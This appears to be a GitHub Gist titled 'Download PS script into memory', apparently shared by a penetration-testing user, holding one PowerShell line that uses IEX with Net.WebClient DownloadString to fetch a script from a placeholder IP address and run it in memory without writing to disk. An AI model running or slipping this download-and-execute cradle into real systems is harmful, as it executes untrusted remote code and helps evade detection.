Skip to content

Instantly share code, notes, and snippets.

@chosenonehacks
Created October 18, 2017 13:54
Show Gist options
  • Save chosenonehacks/850f43824dd9339eb305ac42bd94ab7e to your computer and use it in GitHub Desktop.
Save chosenonehacks/850f43824dd9339eb305ac42bd94ab7e to your computer and use it in GitHub Desktop.
Download PS script into memory
IEX (New-Object Net.WebClient).DownloadString(“http://<ip_address>/full_path/script_name.ps1”)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment